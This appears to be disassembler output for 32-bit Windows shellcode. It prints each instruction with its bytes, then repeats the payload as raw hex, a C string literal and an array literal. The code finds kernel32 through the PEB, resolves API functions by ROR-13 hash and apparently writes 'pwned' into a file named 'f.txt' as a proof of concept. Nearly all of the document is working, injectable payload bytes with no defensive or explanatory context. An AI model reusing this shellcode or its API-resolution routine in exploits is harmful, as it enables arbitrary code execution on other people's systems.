0x0        xor eax, eax                        \x31\xc0                  1.        
0x2        xor ecx, ecx                        \x31\xc9                  1.        
0x4        mov esi, dword ptr fs:[ecx + 0x30]  \x64\x8b\x71\x30          d.q0      
           ; load TIB                                                              
0x8        mov esi, dword ptr [esi + 0xc]      \x8b\x76\x0c              .v.       
           ; load PEB_LDR_DATA LoaderData                                          
0xb        mov esi, dword ptr [esi + 0x1c]     \x8b\x76\x1c              .v.       
           ; LIST_ENTRY InInitializationOrderModuleList                                     
	 label_0xe:
0xe        mov edx, dword ptr [esi + 8]        \x8b\x56\x08              .V.       
0x11       mov edi, dword ptr [esi + 0x20]     \x8b\x7e\x20              .~        
0x14       mov esi, dword ptr [esi]            \x8b\x36                  .6        
           ; advancing DLL flink                                                   
0x16       cmp word ptr [edi + 0x14], cx       \x66\x39\x4f\x14          f9O.      
0x1a       jne 0xe                             \x75\xf2                  u.        

0x1c       mov cx, 0x6d01                      \x66\xb9\x01\x6d          f..m      
0x20       sub cx, 0x6c94                      \x66\x81\xe9\x94\x6c      f...l     
0x25       cmp word ptr [edi], cx              \x66\x39\x0f              f9.       
0x28       mov cx, ax                          \x66\x89\xc1              f..       
0x2b       jne 0xe                             \x75\xe1                  u.        

0x2d       mov ebp, esp                        \x89\xe5                  ..        
0x2f       jmp 0xa2                            \xeb\x71                  .q        

	 label_0x31:
0x31       pushal                              \x60                      `         
0x32       mov ebp, dword ptr [esp + 0x24]     \x8b\x6c\x24\x24          .l$$      
0x36       mov eax, dword ptr [ebp + 0x3c]     \x8b\x45\x3c              .E<       
0x39       mov edx, dword ptr [ebp + eax + 0x78] \x8b\x54\x05\x78          .T.x      
0x3d       add edx, ebp                        \x01\xea                  ..        
0x3f       mov ecx, dword ptr [edx + 0x18]     \x8b\x4a\x18              .J.       
0x42       mov ebx, dword ptr [edx + 0x20]     \x8b\x5a\x20              .Z        
0x45       add ebx, ebp                        \x01\xeb                  ..        
	 label_0x47:
0x47       jecxz 0x7d                          \xe3\x34                  .4        

0x49       dec ecx                             \x49                      I         
0x4a       mov esi, dword ptr [ebx + ecx*4]    \x8b\x34\x8b              .4.       
0x4d       add esi, ebp                        \x01\xee                  ..        
0x4f       xor edi, edi                        \x31\xff                  1.        
0x51       xor eax, eax                        \x31\xc0                  1.        
0x53       cld                                 \xfc                      .         
	 label_0x54:
0x54       lodsb al, byte ptr [esi]            \xac                      .         
0x55       test al, al                         \x84\xc0                  ..        
0x57       je 0x60                             \x74\x07                  t.        

0x59       ror edi, 0xd                        \xc1\xcf\x0d              ...       
0x5c       add edi, eax                        \x01\xc7                  ..        
0x5e       jmp 0x54                            \xeb\xf4                  ..        

	 label_0x60:
0x60       cmp edi, dword ptr [esp + 0x28]     \x3b\x7c\x24\x28          ;|$(      
0x64       jne 0x47                            \x75\xe1                  u.        

0x66       mov ebx, dword ptr [edx + 0x24]     \x8b\x5a\x24              .Z$       
0x69       add ebx, ebp                        \x01\xeb                  ..        
0x6b       mov cx, word ptr [ebx + ecx*2]      \x66\x8b\x0c\x4b          f..K      
0x6f       mov ebx, dword ptr [edx + 0x1c]     \x8b\x5a\x1c              .Z.       
0x72       add ebx, ebp                        \x01\xeb                  ..        
0x74       mov eax, dword ptr [ebx + ecx*4]    \x8b\x04\x8b              ...       
0x77       add eax, ebp                        \x01\xe8                  ..        
0x79       mov dword ptr [esp + 0x1c], eax     \x89\x44\x24\x1c          .D$.      
	 label_0x7d:
0x7d       popal                               \x61                      a         
0x7e       ret                                 \xc3                      .         

	 label_0x7f:
0x7f       lodsd eax, dword ptr [esi]          \xad                      .         
0x80       push eax                            \x50                      P         
0x81       push edx                            \x52                      R         
0x82       call 0x31                           \xe8\xaa\xff\xff\xff      .....     
0x87       mov dword ptr [edi], eax            \x89\x07                  ..        
0x89       add sp, 0x10c                       \x66\x81\xc4\x0c\x01      f....     
0x8e       sub sp, 0x104                       \x66\x81\xec\x04\x01      f....     
0x93       add di, 0x108                       \x66\x81\xc7\x08\x01      f....     
0x98       sub di, 0x104                       \x66\x81\xef\x04\x01      f....     
0x9d       cmp esi, ecx                        \x39\xce                  9.        
0x9f       jne 0x7f                            \x75\xde                  u.        

0xa1       ret                                 \xc3                      .         

	 label_0xa2:
0xa2       jmp 0xb4                            \xeb\x10                  ..        

	 label_0xa4:
0xa4       pop esi                             \x5e                      ^         
0xa5       lea edi, [ebp + 4]                  \x8d\x7d\x04              .}.       
0xa8       mov ecx, esi                        \x89\xf1                  ..        
0xaa       add cl, 0xc                         \x80\xc1\x0c              ...       
0xad       call 0x7f                           \xe8\xcd\xff\xff\xff      .....     
0xb2       jmp 0xef                            \xeb\x3b                  .;        

	 label_0xb4:
0xb4       call 0xa4                           \xe8\xeb\xff\xff\xff      .....     
0xb9       outsb dx, byte ptr [esi]            \x6e                      n         
0xba       db 0x7c (!)                        \x7c                      |         
0xbb       db 0x2e (!)                        \x2e                      .         
0xbc       db 0xe1 (!)                        \xe1                      .         
0xbd       db 0x1e (!)                        \x1e                      .         
0xbe       db 0x3c (!)                        \x3c                      <         
0xbf       db 0x3f (!)                        \x3f                      ?         
0xc0       db 0xd7 (!)                        \xd7                      .         
0xc1       db 0x74 (!)                        \x74                      t         
0xc2       db 0x1e (!)                        \x1e                      .         
0xc3       db 0x48 (!)                        \x48                      H         
0xc4       db 0xcd (!)                        \xcd                      .         
	 label_0xc5:
0xc5       xor edx, edx                        \x31\xd2                  1.        
0xc7       pop eax                             \x58                      X         
0xc8       mov byte ptr [eax + 5], dl          \x88\x50\x05              .P.       
0xcb       jmp 0xfa                            \xeb\x2d                  .-        

	 label_0xcd:
0xcd       xor edx, edx                        \x31\xd2                  1.        
0xcf       pop ecx                             \x59                      Y         
0xd0       mov byte ptr [ecx + 1], dl          \x88\x51\x01              .Q.       
0xd3       jmp 0x101                           \xeb\x2c                  .,        

	 label_0xd5:
0xd5       push ecx                            \x51                      Q         
0xd6       push eax                            \x50                      P         
0xd7       call dword ptr [ebp + 4]            \xff\x55\x04              .U.       
0xda       jmp 0x106                           \xeb\x2a                  .*        

	 label_0xdc:
0xdc       xor edx, edx                        \x31\xd2                  1.        
0xde       pop ecx                             \x59                      Y         
0xdf       mov byte ptr [ecx + 5], dl          \x88\x51\x05              .Q.       
0xe2       jmp 0x111                           \xeb\x2d                  .-        

	 label_0xe4:
0xe4       push ecx                            \x51                      Q         
0xe5       push eax                            \x50                      P         
0xe6       mov esi, eax                        \x89\xc6                  ..        
0xe8       call dword ptr [ebp + 8]            \xff\x55\x08              .U.       
0xeb       push ebx                            \x53                      S         
0xec       call dword ptr [ebp + 0xc]          \xff\x55\x0c              .U.       
	 label_0xef:
0xef       call 0xc5                           \xe8\xd1\xff\xff\xff      .....     
0xf4       f.txtN ; string                    \x66\x2e\x74\x78\x74\x4e            
	 label_0xfa:
0xfa       call 0xcd                           \xe8\xce\xff\xff\xff      .....     
0xff       ja 0x14f                            \x77\x4e                  wN        

	 label_0x101:
0x101      call 0xd5                           \xe8\xcf\xff\xff\xff      .....     
	 label_0x106:
0x106      call 0xdc                           \xe8\xd1\xff\xff\xff      .....     
0x10b      pwnedN ; string                    \x70\x77\x6e\x65\x64\x4e            
	 label_0x111:
0x111      call 0xe4                           \xe8\xce\xff\xff\xff      .....     
0x116      imul eax, dword ptr [eax], 0x65     \x6b\x00\x65              k.e       
0x119      add byte ptr [edx], dh              \x00\x72\x00              .r.       
0x11c      outsb dx, byte ptr [esi]            \x6e                      n         
0x11d      add byte ptr [ebp], ah              \x00\x65\x00              .e.       
0x120      insb byte ptr es:[edi], dx          \x6c                      l         
0x121      add byte ptr [ebx], dh              \x00\x33                  .3        
0x123      add byte ptr [edx], dh              \x00\x32                  .2        
0x125      db 0xff x 0x6                      \xff\xff\xff\xff\xff\xff            
0x12b      imul eax, dword ptr [eax], 0x65     \x6b\x00\x65              k.e       
0x12e      add byte ptr [edx], dh              \x00\x72\x00              .r.       
0x131      outsb dx, byte ptr [esi]            \x6e                      n         
0x132      add byte ptr [ebp], ah              \x00\x65\x00              .e.       
0x135      insb byte ptr es:[edi], dx          \x6c                      l         
0x136      add byte ptr [ebx], dh              \x00\x33                  .3        
0x138      add byte ptr [edx], dh              \x00\x32                  .2        
0x13a      db 0xff                             \xff                      .         
0x13b      db 0xff                             \xff                      .         
0x13c      bramwell ; string                  \x62\x72\x61\x6d\x77\x65\x6c\x6c          
0x144      db 0xff x 0x1f                     \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff          
0x163      inc esp                             \x44                      D         
0x164      dec edi                             \x4f                      O         
0x165      inc esp                             \x44                      D         
0x166      inc esp                             \x44                      D         
0x167      inc esp                             \x44                      D         
0x168      nop                                 \x90                      .         
0x169      db 0xff x 0x4                      \xff\xff\xff\xff                    
0x16d      push ebp                            \x55                      U         
0x16e      inc dword ptr [eax]                 \xff\x00                  ..        
0x170      align 0xd                          \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00          
0x17d      db 0xff (!)                        \xff                      .         
[33;1m
Raw Hex:
[0m"[32;1m31c031c9648b71308b760c8b761c8b56088b7e208b3666394f1475f266b9016d6681e9946c66390f6689c175e189e5eb71608b6c24248b453c8b54057801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3ad5052e8aaffffff89076681c40c016681ec04016681c708016681ef040139ce75dec3eb105e8d7d0489f180c10ce8cdffffffeb3be8ebffffff6e7c2ee11e3c3fd7741e48cd31d258885005eb2d31d259885101eb2c5150ff5504eb2a31d259885105eb2d515089c6ff550853ff550ce8d1ffffff662e7478744ee8ceffffff774ee8cfffffffe8d1ffffff70776e65644ee8ceffffff6b00650072006e0065006c00330032ffffffffffff6b00650072006e0065006c00330032ffff6272616d77656c6cffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff444f44444490ffffffff55ff0000000000000000000000000000ff[0m"
[33;1m
String Literal:
[0m"[32;1m\x31\xc0\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x56\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x14\x75\xf2\x66\xb9\x01\x6d\x66\x81\xe9\x94\x6c\x66\x39\x0f\x66\x89\xc1\x75\xe1\x89\xe5\xeb\x71\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8\xaa\xff\xff\xff\x89\x07\x66\x81\xc4\x0c\x01\x66\x81\xec\x04\x01\x66\x81\xc7\x08\x01\x66\x81\xef\x04\x01\x39\xce\x75\xde\xc3\xeb\x10\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8\xcd\xff\xff\xff\xeb\x3b\xe8\xeb\xff\xff\xff\x6e\x7c\x2e\xe1\x1e\x3c\x3f\xd7\x74\x1e\x48\xcd\x31\xd2\x58\x88\x50\x05\xeb\x2d\x31\xd2\x59\x88\x51\x01\xeb\x2c\x51\x50\xff\x55\x04\xeb\x2a\x31\xd2\x59\x88\x51\x05\xeb\x2d\x51\x50\x89\xc6\xff\x55\x08\x53\xff\x55\x0c\xe8\xd1\xff\xff\xff\x66\x2e\x74\x78\x74\x4e\xe8\xce\xff\xff\xff\x77\x4e\xe8\xcf\xff\xff\xff\xe8\xd1\xff\xff\xff\x70\x77\x6e\x65\x64\x4e\xe8\xce\xff\xff\xff\x6b\x00\x65\x00\x72\x00\x6e\x00\x65\x00\x6c\x00\x33\x00\x32\xff\xff\xff\xff\xff\xff\x6b\x00\x65\x00\x72\x00\x6e\x00\x65\x00\x6c\x00\x33\x00\x32\xff\xff\x62\x72\x61\x6d\x77\x65\x6c\x6c\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x44\x4f\x44\x44\x44\x90\xff\xff\xff\xff\x55\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff[0m"
[33;1m
Array Literal:
[0m{[32;1m0x31, 0xc0, 0x31, 0xc9, 0x64, 0x8b, 0x71, 0x30, 0x8b, 0x76, 0x0c, 0x8b, 0x76, 0x1c, 0x8b, 0x56, 0x08, 0x8b, 0x7e, 0x20, 0x8b, 0x36, 0x66, 0x39, 0x4f, 0x14, 0x75, 0xf2, 0x66, 0xb9, 0x01, 0x6d, 0x66, 0x81, 0xe9, 0x94, 0x6c, 0x66, 0x39, 0x0f, 0x66, 0x89, 0xc1, 0x75, 0xe1, 0x89, 0xe5, 0xeb, 0x71, 0x60, 0x8b, 0x6c, 0x24, 0x24, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x34, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0x31, 0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf4, 0x3b, 0x7c, 0x24, 0x28, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0x89, 0x44, 0x24, 0x1c, 0x61, 0xc3, 0xad, 0x50, 0x52, 0xe8, 0xaa, 0xff, 0xff, 0xff, 0x89, 0x07, 0x66, 0x81, 0xc4, 0x0c, 0x01, 0x66, 0x81, 0xec, 0x04, 0x01, 0x66, 0x81, 0xc7, 0x08, 0x01, 0x66, 0x81, 0xef, 0x04, 0x01, 0x39, 0xce, 0x75, 0xde, 0xc3, 0xeb, 0x10, 0x5e, 0x8d, 0x7d, 0x04, 0x89, 0xf1, 0x80, 0xc1, 0x0c, 0xe8, 0xcd, 0xff, 0xff, 0xff, 0xeb, 0x3b, 0xe8, 0xeb, 0xff, 0xff, 0xff, 0x6e, 0x7c, 0x2e, 0xe1, 0x1e, 0x3c, 0x3f, 0xd7, 0x74, 0x1e, 0x48, 0xcd, 0x31, 0xd2, 0x58, 0x88, 0x50, 0x05, 0xeb, 0x2d, 0x31, 0xd2, 0x59, 0x88, 0x51, 0x01, 0xeb, 0x2c, 0x51, 0x50, 0xff, 0x55, 0x04, 0xeb, 0x2a, 0x31, 0xd2, 0x59, 0x88, 0x51, 0x05, 0xeb, 0x2d, 0x51, 0x50, 0x89, 0xc6, 0xff, 0x55, 0x08, 0x53, 0xff, 0x55, 0x0c, 0xe8, 0xd1, 0xff, 0xff, 0xff, 0x66, 0x2e, 0x74, 0x78, 0x74, 0x4e, 0xe8, 0xce, 0xff, 0xff, 0xff, 0x77, 0x4e, 0xe8, 0xcf, 0xff, 0xff, 0xff, 0xe8, 0xd1, 0xff, 0xff, 0xff, 0x70, 0x77, 0x6e, 0x65, 0x64, 0x4e, 0xe8, 0xce, 0xff, 0xff, 0xff, 0x6b, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6e, 0x00, 0x65, 0x00, 0x6c, 0x00, 0x33, 0x00, 0x32, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x6b, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6e, 0x00, 0x65, 0x00, 0x6c, 0x00, 0x33, 0x00, 0x32, 0xff, 0xff, 0x62, 0x72, 0x61, 0x6d, 0x77, 0x65, 0x6c, 0x6c, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x44, 0x4f, 0x44, 0x44, 0x44, 0x90, 0xff, 0xff, 0xff, 0xff, 0x55, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff[0m}
